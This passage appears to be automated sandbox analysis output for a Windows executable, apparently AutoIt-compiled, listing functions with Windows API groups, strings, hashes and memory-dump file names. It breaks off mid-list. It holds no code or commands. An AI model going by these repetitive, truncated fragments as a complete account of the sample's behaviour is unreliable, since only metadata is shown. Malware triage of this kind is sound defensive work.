                                                                                          • String ID:
                                                                                          • API String ID: 564229958-0
                                                                                          • Opcode ID: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                          • Instruction ID: 4b8a97298ecc6a9714d36a64de38ad1ec6711718e82c8922b416dc06af96e6bc
                                                                                          • Opcode Fuzzy Hash: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                          • Instruction Fuzzy Hash: 0F513322A1C682D6EB20FF60D4502EDA365FFA4784FC00132E68D576A9FFA8D645C770
                                                                                          Function 00007FF74D03D4CC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                          • API String ID: 0-2263619337
                                                                                          • Opcode ID: e719f584031d415f058583bc3760330c0d061c7a3d1d344f28d0a5967c239e6c
                                                                                          • Instruction ID: bb804d5c7c3b6cf4fa15bf37b1012657d587434a13bf98a40cc75d0c6c93c4c1
                                                                                          • Opcode Fuzzy Hash: e719f584031d415f058583bc3760330c0d061c7a3d1d344f28d0a5967c239e6c
                                                                                          • Instruction Fuzzy Hash: 8951E432B0DA06C6EB10FB68E1501BCB3A5EB45B88F918531DA8E47BB5EE79D405C360
                                                                                          Function 00007FF74D031E04 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                          • String ID:
                                                                                          • API String ID: 2592858361-0
                                                                                          • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                          • Instruction ID: d5650faf775136eea4de81d71d353fe7b78424879355562cf60d91fada36dd02
                                                                                          • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                          • Instruction Fuzzy Hash: 3D518F36B0C682C6E620FB15E548379B7A0FB89B94F914235DA9D07BA4EF7DE4418B10
                                                                                          Function 00007FF74D09D2C4 Relevance: 9.1, APIs: 6, Instructions: 77processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                          • String ID:
                                                                                          • API String ID: 1413079979-0
                                                                                          • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                          • Instruction ID: 730fbfaeb9393836c1679daf77e03b0d3560082b1c917f723b18d4118057a8e2
                                                                                          • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                          • Instruction Fuzzy Hash: 46314B3260CB85C6D764EF02E4847AAB7A5FB89B90F54812ADECD43B24DF79D445CB10
                                                                                          Function 00007FF74D061E74 Relevance: 9.1, APIs: 6, Instructions: 56threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 2082702847-0
                                                                                          • Opcode ID: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                                          • Instruction ID: 25501f9d70bc30025246da5a6ff2d8bf4ce587c452708754bdce34d8a73e50e9
                                                                                          • Opcode Fuzzy Hash: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                                          • Instruction Fuzzy Hash: 86213E21B0D746C1EE14BBB1A418279A2D0AF44B74F940B34DAAD077F5FF3CE4148621
                                                                                          Function 00007FF74D0A2240 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDevice$Release
                                                                                          • String ID:
                                                                                          • API String ID: 1035833867-0
                                                                                          • Opcode ID: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                                          • Instruction ID: d51501aecfb0f79a70c014587aecabc22a0ae96305f674e6bdea2d1beae42392
                                                                                          • Opcode Fuzzy Hash: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                                          • Instruction Fuzzy Hash: B511A035B1C705C6EB18EB71985C129A6A1FB8CBC0F858939DE8E47BA4EE3DD8018710
                                                                                          Function 00007FF74D0E09FC Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                          • String ID:
                                                                                          • API String ID: 43455801-0
                                                                                          • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                                          • Instruction ID: 92c3dc659fa529871d270ccf2e069da1881886c78b860cdff17e6f7a83bcf9f5
                                                                                          • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                                          • Instruction Fuzzy Hash: 5A11BF31B1C286C2E714BB16B80C768EB60EB89B94F884534CF8603B60EF7EE444CB50
                                                                                          Function 00007FF74D052D5C Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual
                                                                                          • String ID:
                                                                                          • API String ID: 4278518827-0
                                                                                          • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                          • Instruction ID: 54941a95ab0ef6b4b6f4e7e31bfb5161bd2f93343836fffd9313429c0832fd8e
                                                                                          • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                          • Instruction Fuzzy Hash: 1611306290D684CAD358EF39DC4C2197BB2FB5CB08B948434C2598F275FE39D49AC710
                                                                                          Function 00007FF74D0ADA1C Relevance: 9.0, APIs: 6, Instructions: 34windowtimethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                          • String ID:
                                                                                          • API String ID: 839392675-0
                                                                                          • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                          • Instruction ID: c685810c7f71bdf86a9fd1163d27cab3fd0210a87f4426bfe7695502966d923a
                                                                                          • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                          • Instruction Fuzzy Hash: BE015A72A1C785C3EB10AB21A81CA29A361AB8DB95F845434CA8A07B24EF7CD0488B10
                                                                                          Function 00007FF74D09F378 Relevance: 9.0, APIs: 6, Instructions: 33threadwindowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                          • String ID:
                                                                                          • API String ID: 179993514-0
                                                                                          • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                          • Instruction ID: f21a28af6d3f6cb46bdcd409d3620bb01afaa67c3f178157ff4c33e7551a5179
                                                                                          • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                          • Instruction Fuzzy Hash: D9F06920F1C756C3FB50BB61A84DB29A2A2BF8D744FC44435D98A03A60EE3CD0848A20
                                                                                          Function 00007FF74D09D868 Relevance: 9.0, APIs: 6, Instructions: 22memorysynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                          • String ID:
                                                                                          • API String ID: 146765662-0
                                                                                          • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                          • Instruction ID: 86dfed4cf6ee92278d453fc7f486a5b5a02bc53f8758d24559b799162c9f8903
                                                                                          • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                          • Instruction Fuzzy Hash: A2F0F821A1CA05C2EB04FB76E85D128A361EB8DFA5B444535CD9E47374EE3CD4958310
                                                                                          Function 00007FF74D0C7E38 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                                          • String ID: NULL Pointer assignment
                                                                                          • API String ID: 1653399731-2785691316
                                                                                          • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                          • Instruction ID: 8e22d4dabcfba0ecbc75311160524e1ed4507c81de43af26bd06f060ca500fa5
                                                                                          • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                          • Instruction Fuzzy Hash: BCB13A32A0CA41CAE714EF65D4801ADB7B5FB84798F900135EE8D57B68EF38E545CB50
                                                                                          Function 00007FF74D0CCDF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF74D0CBF47), ref: 00007FF74D0CCE29
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharLower
                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                          • API String ID: 2358735015-567219261
                                                                                          • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                          • Instruction ID: 69bd1c228d9c9968eef07c0425f807922a51ccdb046e2dd02146713a87c9490f
                                                                                          • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                          • Instruction Fuzzy Hash: EF91D522F1C652C1EA68BF2AD44057DA3A1BB15B90B904531DE9D937A4FF3DE852D320
                                                                                          Function 00007FF74D0C6920 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 212COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                          • API String ID: 4237274167-1221869570
                                                                                          • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                          • Instruction ID: 9d07687e64ce945d8bb3ef6a783f93ce885f7d988beefc1f3a0dc8abced07d9e
                                                                                          • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                          • Instruction Fuzzy Hash: 0D916B26B0DB42C6EB24FF65D0442ADB3A4EB88B98BC54432DE8D57765EF38E445C360
                                                                                          Function 00007FF74D0A0EAF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 00007FF74D0A0EDB
                                                                                            • Part of subcall function 00007FF74D0A0B90: CharUpperBuffW.USER32(?,?,00000001,00007FF74D0A0F61), ref: 00007FF74D0A0C6A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharForegroundUpperWindow
                                                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                                          • API String ID: 3570115564-1994484594
                                                                                          • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                          • Instruction ID: 568198258d1397e31e0aacdfe4feff86dd971b82bc19b27b84ccea774625a7e5
                                                                                          • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                          • Instruction Fuzzy Hash: 2C719D12F0DA43C2EA64BB65E4112BDE2E1AF64784FC44431DA8D877A5FF7CE5448231
                                                                                          Function 00007FF74D0A9898 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharUpper
                                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                          • API String ID: 3964851224-769500911
                                                                                          • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                          • Instruction ID: 0b32bf86902a199e349030c8d50fe3b290830acb22209d7e77bef9e50d7aa683
                                                                                          • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                          • Instruction Fuzzy Hash: 0D41C522F1DA53C1EA607B69A445179E2D1AB35BD0BD40631CADD87BA4FE6DE8428330
                                                                                          Function 00007FF74D069B18 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: #$E$O
                                                                                          • API String ID: 3215553584-248080428
                                                                                          • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                          • Instruction ID: 31a55c7654bde3ebd8850b83d5111459f3269d6b8e726b542d40ab2da3904f9d
                                                                                          • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                          • Instruction Fuzzy Hash: AD418F22B1D751C4EF51BFA1A9401ADA3E0BF55B98F884131EE8D07BA9EF3CE4518320
                                                                                          Function 00007FF74D0AB62C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
